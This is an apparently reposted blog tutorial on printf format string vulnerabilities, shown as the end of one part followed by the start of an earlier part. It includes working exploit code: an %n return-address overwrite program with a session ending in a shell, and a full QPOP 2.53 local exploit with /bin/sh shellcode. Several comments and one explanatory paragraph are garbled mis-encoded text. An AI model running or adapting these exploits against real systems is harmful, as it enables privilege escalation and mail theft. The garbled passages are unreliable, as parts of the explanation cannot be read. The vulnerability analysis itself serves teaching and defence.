聽(tīng) SH1 = (shell_addr >> 24) & 0xff;
聽(tīng) SH2 = (shell_addr >> 16) & 0xff;
聽(tīng) SH3 = (shell_addr >>聽(tīng) 8) & 0xff;
聽(tīng) SH4 = (shell_addr >>聽(tīng) 0) & 0xff;

聽(tīng) /* 濡傛灉SH4灝忎簬44,鎴戜滑灝卞澶у畠鐨勫鹼紝璁╁畠絳変簬44 + 1,浠ュ厤鍑虹幇璐熷?*/
聽(tīng) if( (SH4 - 4 - 12 - 4 - 8*3) <= 0) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) oldSH4 = SH4;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) SH4 = 4 + 12 + 4 + 8*3 + 1;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) printf("Using New Shellcode address: 0x%x\n", shell_addr+SH4-oldSH4);
聽(tīng) }
聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr = buff;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) for (i = 0; i <4 ; i++, retloc++ ){
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) memset(ptr,'A',4);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr += 4 ;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) =聽(tīng) retloc & 0xff;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* 濉厖retloc+n (n= 0,1,2,3) */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc >> 8聽(tīng) ) & 0xff ;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc >> 16 ) & 0xff ;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc >> 24 ) & 0xff ;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) }
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) for(i = 0 ; i < 4 ; i++ )
聽(tīng)聽(tīng)聽(tīng)聽(tīng) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) memcpy(ptr, "%c", 2); /* 杈撳叆鏍煎紡涓詫紝璋冩暣%n鎵瀵瑰簲鐨勪綅緗?*/
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr += 2;
聽(tīng)聽(tīng)聽(tīng)聽(tīng) }
聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* "杈撳叆"鎴戜滑鐨剆hellcode鍦板潃 */
聽(tīng)聽(tīng)聽(tīng)聽(tīng) sprintf(ptr, "%%%uc%%n%%%uc%%n%%%uc%%n%%%uc%%n",(SH4 - 4 - 12 - 4 - 8*3),
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (SH3 - SH4),(SH2 - SH3),(0x0100 + SH1 - SH2) );
聽(tīng)
聽(tīng) ptr = egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = NOP;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < strlen(shellcode); i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = shellcode[i];聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) egg[eggsize - 1] = '\0';聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) memcpy(egg, "EGG=", 4);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) env[0] = egg ;
聽(tīng) env[1] = (char *)0 ;

聽(tīng) execle("./vul","vul",buff + align, NULL,env);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng) /* end of main */聽(tīng)聽(tīng)聽(tīng)聽(tīng)

<- end ->

Let's verify it:
[warning3@rh62 format]$ ./exp3
Usages: ./exp3 <RETloc> <offset> <align> <buffsize> <eggsize>
Using RET location address: 0xbffffabc
Using Shellcode address: 0xbffffcfa
argv[1] = AA璐憋5綬糀AA鏅嬶5綬糀AA鑿岋5綬糀AA紿ワ5?c%c%c%c%206c%n%2c%n%3c%n%192c%n
bash$ id
uid=500(warning3) gid=500(warning3) groups=500(warning3)
This program has been verified on redhat 6.1 and redhat 6.2.


<4> Attack method four: overwriting the return address in several writes (using %hn)
=========================================

drow's statd-toy.c offers yet another method: using %hn, which overwrites the high 16 bits of a word:

int main(void)
{
int a=0x41414141;
printf("a=%#x%hn\n",a,&a);   /* %hn stores the 16-bit character count into a */
printf("a=%#x\n",a);
return 0;
}

[warning3@redhat-6 wuftp]$ ./aa
a=0x41414141
a=0x4141000c

<....> Look at it with gdb:
(gdb) b 5
Breakpoint 1 at 0x80483ea: file aa.c, line 5.
(gdb) r
Starting program: /home/warning3/wuftp/./aa
a=0x41414141

Breakpoint 1, main () at aa.c:5
5        printf("a=%#x\n",a);
(gdb) p &a
$1 = (int *) 0xbffffcb4
(gdb) x/4b 0xbffffcb4
0xbffffcb4:     0x0c    0x00    0x41    0x41

So we only need two overwrites. The details are similar to the previous method, and interested readers can test it themselves.
The advantage of this method is that we do not clobber any extra addresses: it only overwrites the two bytes at the specified address!


Comparing the methods above, the third and fourth are the most general and apply in all situations. The first and second each have their own limitations and depend more on the characteristics of the application itself.

All of them share one limitation, however: the address at which the return address is stored, retloc, must be given exactly; being off by even one byte will not work. This greatly reduces the success rate of the attack. Recall why an ordinary exploit succeeds so easily: it usually fills the stack with a run of return addresses, so it only needs to overwrite the return address at retloc somewhere along the way and does not need to know the exact value of retloc. Here, by contrast, we must specify retloc precisely and write the shellcode address directly into the return address slot. Since retloc depends heavily on factors such as the user's environment variables, it is often uncertain, and succeeding on the first try is not easy. If we could instead specify a set of addresses retloc, retloc+4, retloc+8, ... and store the shellcode address at each of them, wouldn't that improve our odds? With method 4 this is easy to do. Interested readers can work out the details themselves, or contact me.

Also, %n is not limited to overwriting return addresses; it can also be used to overwrite other stored data, such as saved uid and gid values.
Closing remarks
========

Although the overflow problems caused by format strings look fairly complicated, they are completely avoidable if programmers take a little care when writing applications. Carelessness really is the great enemy of security. :-) This was written in a hurry, so errors and omissions are unavoidable; criticism and corrections are welcome.

References
==========
[1] <<Format Bugs: What are they, Where did they come from, ......... How to exploit them>>, lamagra (lamagra@digibel.org)
[2] <<Remote shell via Qpopper2.53>>, prizm (prizm@resentment.org)
[3] <<More info on format bugs>>, Pascal Bouchareine [ kalou <pb@grolier.fr> ]

Asp 2006-10-20 20:55
]]>
*printf() format string security vulnerability analysis (part 1) (repost)
http://m.shnenglu.com/asp/archive/2006/10/20/13921.html
Asp, Fri, 20 Oct 2006 12:54:00 GMT

Foreword:
=====
Recently a new form of security vulnerability has begun to attract attention: the format string problem in the many *printf() functions. The problem is actually not new; nobody paid attention to it until recently, when some in-depth discussion started. Format string problems are the result of programmer carelessness. Let's look at exactly what happens.

About format strings
============
The *printf() functions include printf, fprintf, sprintf, snprintf, vprintf, vfprintf, vsprintf, vsnprintf and so on; they format data and output it. Take the simplest, printf(), as an example:
int printf(const char *format, arg1,arg2,...);

By choosing the content of format (%s, %d, %p, %x, ...), the user can output data in a chosen layout. The problem is that the *printf() functions cannot determine where the data arguments arg1, arg2, ... end; in other words, they do not know the number of arguments. They simply print, one after another, the contents of the stack at the addresses following the format parameter, as many times as there are conversion specifiers in format. Let's first look at a simple example:
<- begin ->  fmt_test.c

#include <stdio.h>

int main(void)
{
   char string[]="Hello World!";

   /* deliberately only one argument for three conversion specifiers */
   printf("String: %s  , arg2: %#p , arg3: %#p\n", string);
   return 0;
}

<- end ->

In the example above we actually supplied only one data argument, "string", but the format string contains three conversion specifiers. Let's look at the result of running it:
[warning3@redhat-6 format]$ gcc -o fmt_test fmt_test.c
[warning3@redhat-6 format]$ ./fmt_test
String: Hello World!  , arg2: 0x6c6c6548 , arg3: 0x6f57206f

Let's see where the contents displayed for arg2 and arg3 come from:
[warning3@redhat-6 format]$ gdb ./fmt_test
<...>
(gdb) b printf
Breakpoint 1 at 0x8048308
(gdb) r
Starting program: /home/warning3/format/./fmt_test
Breakpoint 1 at 0x40064f5c: file printf.c, line 30.

Breakpoint 1, printf (
    format=0x80484c0 "String: %s  , arg2: %#p , arg3: %#p\n") at printf.c:30
30      printf.c: No such file or directory.
(gdb) x/10x $ebp
0xbffffc88:     0xbffffca8      0x08048403      0x080484c0      0xbffffc98
0xbffffc98:     0x6c6c6548      0x6f57206f      0x21646c72      0x08049500
0xbffffca8:     0xbffffcc8      0x400301eb

We see that the address of printf()'s first parameter is $ebp+8, and its content is 0x080484c0:
(gdb) x/s 0x080484c0
0x80484c0 <_IO_stdin_used+60>:   "String: %s  , arg2: %#p , arg3: %#p\n"
This is the address of our format string.

Now look at the data we want to format ($ebp+12):
(gdb) x/s 0xbffffc98
0xbffffc98:      "Hello World!"

We see that the contents of the next two words are exactly what the program displayed:
$ebp+16: 0x6c6c6548  "Hell"
$ebp+20: 0x6f57206f  "o Wo"

The following diagram makes it clearer:

                  top of stack
           +------------+
           |   ......   |
           +------------+
0xbffffc88 | 0xbffffca8 | --------> saved EBP   -- printf()
           +------------+
           | 0x08048403 | --------> saved EIP   -- printf()
           +------------+   format
format->   | 0x080484c0 | --------> address of "String: %s  , arg2: %#p , arg3: %#p\n"
           +------------+   arg1
           | 0xbffffc98 | --------> address of "Hello World!"
           +------------+
           | 0x6c6c6548 | --------> string[] = "Hell
           +------------+
           | 0x6f57206f | -------->             o Wo
           +------------+
           | 0x21646c72 | -------->             rld!"
           +------------+
           | 0x08049500 | -------->    '\0'xxx
           +------------+
0xbffffca8 | 0xbffffcc8 | --------> saved EBP   -- main()
           +------------+
           | 0x400301eb | --------> saved EIP   -- main()
           +------------+
           |   ......   |
           +------------+
                  bottom of stack

鎴戜滑鍙互鐪嬪埌錛宎rg2,arg3鎵鏄劇ず鐨勫叾瀹炴槸main()涓暟緇剆trings涓墠涓や釜瀛楃殑鍐呭銆?br />浠庝笂闈㈣繖涓畝鍗曠殑渚嬪瓙鎴戜滑鍙互鐪嬪埌, *printf()鍙牴鎹甪ormat涓墦鍗版牸寮?%)鐨勬暟鐩潵渚濇
鏄劇ず鍫嗘爤涓璮ormat鍙傛暟鍚庨潰鍦板潃鐨勫唴瀹?姣忔縐誨姩涓涓瓧(4涓瓧鑺?.
鐢變簬鎴戜滑涓婇潰鐨勪緥瀛愪腑鍑虹幇浜?jiǎn)涓変?%)鍙鳳紝鎵浠ュ畠浼?xì)渚潒啤鎵撳嶎C笁涓湴鍧鐨勫唴瀹?
format+4, format + 8, format + 12.

(娉ㄦ剰錛氬茍涓嶆槸鎵鏈夌殑%鏍煎紡閮芥槸縐誨姩4涓瓧鑺傦紝渚嬪%f灝辨瘡嬈$Щ鍔?涓瓧鑺傘傚鏋滆瑕嗙洊鐨勫湴鍧
璺濈姣旇緝榪?姣斿2048瀛楄妭)錛岃?鐨勪釜鏁板張鏈夋墍闄愬埗鐨勮瘽錛屼嬌鐢?f鍙互杈冨揩鐨勫埌杈?鐩殑鍦?錛?br />鍙渶瑕?56涓?f灝卞彲浠ヤ簡(jiǎn),%E涔熸槸濡傛)

Normally the format string is written by the programmer, so the situation above rarely arises, and even when it does it rarely causes a serious security problem. If the format string is supplied by the user, however, it becomes very dangerous! This usually happens through the programmer's carelessness. The most common case is when vsprintf() and friends are used to build a printf()-like function of one's own, for example

mylog(LEVEL, "username = %s", username);

If mylog is mistakenly called as mylog(LEVEL,user_buf), and the content of user_buf is under the user's control, the real danger appears.

1. Problem one: classic buffer overflows caused by format strings
==========================================
We use the recently discovered QPOP 2.53 case as a detailed illustration.

In QPOP 2.53, pop_uidl.c contains a function pop_euidl (p) that implements the EUIDL command; it uses the pop_msg() function incorrectly:
.......
pop_euidl (p)
POP     *   p;
{
     char                    buffer[MAXLINELEN];      /*  Read buffer */
     char            *nl, *bp;
     MsgInfoList     *   mp;                          /*  Pointer to message info list */
......
       if (mp->del_flag) {

       /* Note: this use of pop_msg() is correct! Compare it with the
          pop_msg() call further down. */
         return (pop_msg (p,POP_FAILURE,
                   "Message %d has been marked for deletion.",msg_id));
       } else {

     sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
         if (nl = index(buffer, NEWLINE)) *nl = 0;
         /* The sprintf() below copies user-supplied data into buffer; because the
            width of %s is limited, no buffer overflow happens here. */

     sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));

     /* Note: here buffer is passed directly as the third argument to pop_msg().
        That is the mistake! */
     return (pop_msg (p,POP_SUCCESS, buffer));
       }

Now let's look at the pop_msg() function, defined in pop_msg.c:

......
#define BUFSIZE 2048
......
#ifdef __STDC__
/* We see that pop_msg()'s third parameter is the format string */
pop_msg(POP *p, int stat, const char *format,...)
#else
pop_msg(va_alist)
va_dcl
#endif
{
#ifndef __STDC__
     POP                 *   p;
     int                     stat;               /*  POP status indicator */
     char                *   format;             /*  Format string for the message */
#endif
     va_list                 ap;
     register char       *   mp;
#ifdef PYRAMID
     char            *   arg1, *arg2, *arg3, *arg4, *arg5, *arg6;
#endif
     char                    message[BUFSIZE]; /* a buffer of BUFSIZE = 2048 bytes */

#ifdef __STDC__
     va_start(ap,format);
.......

     /*  Point to the message buffer */
     mp = message;                               /* mp points to the start of message[] */
......
     /*  Append the message (formatted, if necessary) */
     if (format) {
#ifdef HAVE_VPRINTF
/* Here the variable arguments ap are formatted according to format into the
   message[] that mp points to. Note: the size of the copied data is not checked! */
         vsprintf(mp,format,ap);

.....

We see that the buffer from pop_euidl() should have appeared in the position of pop_msg()'s fourth parameter, that is, among the contents pointed to by pop_msg()'s ap. The correct form is:
pop_msg (p,POP_SUCCESS, "%s", buffer);
Because the length of buffer is limited, the vsprintf() in pop_msg() would then not overflow.
But through the programmer's carelessness, buffer was placed in the third parameter position, which is what format points to inside pop_msg(). Part of buffer's content is supplied by the user, so if the user's input contains certain special conversion specifiers, the vsprintf() call can be used to overflow the message buffer.

So how exactly is that done? We know that an important part of a conversion specification is the width, for example %.20d, %20d, %20s, %.20s and so on. Take printf("%.20d",num): if the integer num is shorter than 20 digits, printf() pads it with leading zeros so that the printed length is 20. For example:
printf("%.20d\n",12345);
prints the following:
00000000000000012345

This raises the question: can we fill the message buffer by specifying a width? If we construct the content of buffer to look like this:

xxx%.2000d<RET><RET>...<RET>

then vsprintf(mp,"xxx%.2000d<RET><RET>...<RET>",ap);
may cause <RET> to overwrite the return address of pop_msg(). If we can place shellcode at the address <RET>, we may obtain a remote shell. Since Qpopper usually does not drop the mail group privilege, we can get a shell with gid=mail and read other ordinary users' mail....

To reach our goal, we need to:

<1> Send a mail to the user to be attacked, putting our shellcode in the X-UIDL: field
     and %.2000d<RET><RET>...<RET> in the From: field.
     Note that the address <RET> can only be determined by debugging; it should point to where our shellcode lies.

<2> Log in to the QPOP server as that user and run the EUIDL num command, where num is the
     sequence number of the special mail we just sent.

     If all goes well, you get a shell with gid mail.

Below is a simple test program that gives you a local gid mail shell:
(you may need to adjust retloc and the address of POP *p yourself for it to succeed)

<- begin ->  qpop2.53_local.c

/*  QPOP 2.53 local exploit .
 *  code based on the sample exploit by Prizm/b0f.
 *  usages:
 *    [test@redhat-6 /tmp]$ ./qp 0xbfffcba4 0xbfffdbf8 >/var/spool/mail/test
 *    [test@redhat-6 /tmp]$ nc localhost 110
 *
 *     +OK QPOP (version 2.53) at localhost.localdomain starting.
 *     user test
 *     +OK Password required for test.
 *     pass 123456
 *     +OK test has 1 message (307 octets).
 *     euidl 1
 *     <...snip...>
 *     id
 *     uid=514(test) gid=12(mail) groups=12(mail)
 *                                                        warning3@isbase.com
 *                                                        y2k/5/28
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[]=
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
   "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
   "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
   "\xff\xff/bin/sh....";

int main(int argc, char *argv[])
{
        int i;
        unsigned long ra=0;
        unsigned long p= 0xbffffdf8;
        if(argc<2) {
                fprintf(stderr,"Usage: %s return_addr POP(*)_addr\n", argv[0]);
                exit(0);
        }
        sscanf(argv[1], "%lx", &ra);
        /* Because pop_msg() still needs a valid POP *p pointer to return cleanly
         * after the overflow, we must supply a valid address (default above).
         */
        if(argc>2)
                sscanf(argv[2], "%lx", &p);
        if(!ra)
                return 1;
        if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
                fprintf(stderr,"Bad shellcode\n");
                exit(0);
        }
        fprintf(stderr,"return address: 0x%.8lx\n", ra);
        fprintf(stderr,"p address: 0x%.8lx\n", p);
        printf("From root  Sun May 28 17:29:37 2000\n");
        printf("Date: Sun, 28 May 2000 17:29:37 +0800\n");
        printf("From: %s", "%.500d%.500d%.500d%.398d");
        for(i=0; i < 20; i++)
          printf("%c%c%c%c", (int)(ra & 0xff), (int)((ra & 0xff00)>>8), (int)((ra & 0xff0000)>>16), (int)((ra & 0xff000000)>>24)); /* consecutive return addresses */
        printf("%c%c%c%c", (int)(p & 0xff), (int)((p & 0xff00)>>8), (int)((p & 0xff0000)>>16), (int)((p & 0xff000000)>>24)); /* a valid POP *p pointer */
        printf ("\n");
        printf ("Subject: haha\n");
        printf ("Message-Id: <200005280929.RAA03577@localhost.localdomain>\n");
        printf("X-UIDL: ");
        for(i=0; i < sizeof(shellcode);i++)
                printf("%c", shellcode[i]);
        printf("\n");
        printf ("\n\n");
        return 0;
}
<- end ->


2. Problem two: a format string overwriting a function's return address

========================================
Let us look at another problem: %n. In a format string, %n means: write the number of characters output so far
into a variable. Its usual use looks like this:

<- begin ->  n_test.c

#include <stdio.h>

int main(void)
{
  int num=0x41414141;

  printf("Before: num = %#x \n", num);
  printf("%.20d%n\n", num, &num);   /* %n stores the number of characters printed so far (20) into num */
  printf("After: num = %#x \n", num);

  return 0;
}

<- end ->

[warning3@redhat-6 format]$ ./n_test
Before: num = 0x41414141
00000000001094795585
After: num = 0x14

We see that the value of num has become 0x14 (20). That is, because our program pushed the address of num
onto the stack as the second argument of printf(), %n stored the total number of characters printed at the address of the corresponding argument.<br />So what happens if we do not push the address of num onto the stack?<br />

[warning3@redhat-6 format]$ vi n_test.c

<- begin ->  n_test1.c

#include <stdio.h>

int main(void)
{
  int num=0x41414141;

  printf("Before: num = %#x \n", num);
  printf("%.20d%n\n", num);              /* note: we did NOT pass num's address for %n (deliberate) */
  printf("After: num = %#x \n", num);

  return 0;
}

<- end ->

[warning3@redhat-6 format]$ ./n_test1
Before: num = 0x41414141
Segmentation fault (core dumped)      <--- the segfault occurs while executing the second printf()
[warning3@redhat-6 format]$ gdb ./n_test core
GNU gdb 4.18
<...>
#0  0x4005d897 in _IO_vfprintf (s=0x40104c60, format=0x8048474 "%.20d%n\n",
    ap=0xbffffca8) at vfprintf.c:1212
1212    vfprintf.c: No such file or directory.
(gdb) x/i $pc                                   <--- let us look at the next instruction
0x4005d897 <_IO_vfprintf+2455>: mov     %eax,(%ecx)    <--- store the value of eax at the address held in ecx
(gdb) i r $ecx                                  <--- the destination address is 0x41414141
ecx            0x41414141       1094795585
(gdb) i r $eax
eax            0x14     20                      <--- the value being stored is 0x14 (20)
(gdb)

Clearly the segfault happened while performing the %n operation: 0x41414141 is certainly not an accessible address. We
notice that the initial value of num was exactly 0x41414141; is there a connection between the two? From the earlier discussion of fmt_test.c
we should already be able to see it: printf() took the variable num in main()'s stack frame as the argument corresponding to %n,
and therefore stored 0x14 at 0x41414141. The attentive reader will realise that if we can control
the contents of num, we can modify the contents of any address (any writable address, of course). Yes.
The first thing that comes to mind is overwriting a function's return address; let us modify the program:

<- begin ->  n_test2.c

#include <stdio.h>

int main(void)
{
  int num=0xbffffcbc;                    /* chosen to equal the address of main()'s saved return address on the test machine */

  printf("Press Any Key to Continue...\n");
  getchar();                             /* pause so a debugger can be attached from another terminal */
  printf("Before: num = %#x \n", num);
  printf("%.1094795585u%n\n", num);      /* 1094795585 = 0x41414141; no address passed for %n (deliberate) */
  printf("After: num = %#x \n", num);

  return 0;
}

<- end ->


Here the value of num is main()'s return address. Our aim is to overwrite main()'s return address with 0x41414141,
so that when main() returns it jumps to 0x41414141 to execute. That of course causes a segfault;
this is only an example.<br />The getchar() is there purely for debugging convenience; you will see in a moment why it was added.<br />Careful readers may notice that I replaced %d with %u. This is because if the value to be
printed is negative, printf automatically prepends a '-' sign, so the actual printed length is
one larger, and in this example we could end up jumping to 0x41414142 instead. Here that makes no
difference, but if we had many %d's, for example "%d%d%d...%d%d", we could not simply compute
the length of the output from the number of "%d"s; we would also have to account for the possible '-' signs. For simplicity we use %u, which
prints the result as an unsigned integer, so the '-' sign need not be considered.<br />
Let us look at the result; this was run on a RedHat 6.1 machine:<br />[warning3@redhat-6 format]$ gcc -o n2 -g n_test2.c
[warning3@redhat-6 format]$ ./n2
Press Any Key to Continue...

Now we open another terminal [tty2] to debug:
<in terminal tty2>

[warning3@redhat-6 format]$ gdb ./n2 `ps -auxw|grep './n2'|grep -v grep|awk '{print $2}'`
GNU gdb 4.18
<......>
Attaching to program: /home/warning3/format/./n2, Pid 28428
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
0x400bcdb4 in __libc_read () from /lib/libc.so.6
(gdb) bt
#0  0x400bcdb4 in __libc_read () from /lib/libc.so.6
#1  0x4010648c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4006c7a1 in _IO_new_file_underflow (fp=0x40104ba0) at fileops.c:385
#3  0x4006e6f1 in _IO_default_uflow (fp=0x40104ba0) at genops.c:371
#4  0x4006db5c in __uflow (fp=0x40104ba0) at genops.c:328
#5  0x4006af56 in getchar () at getchar.c:37
#6  0x8048417 in main () at n_test2.c:6
(gdb) i f 6
Stack frame at 0xbffffcb8:
eip = 0x8048417 in main (n_test2.c:6); saved eip 0x400301eb
caller of frame at 0xbffffcac
source language c.
Arglist at 0xbffffcb8, args:
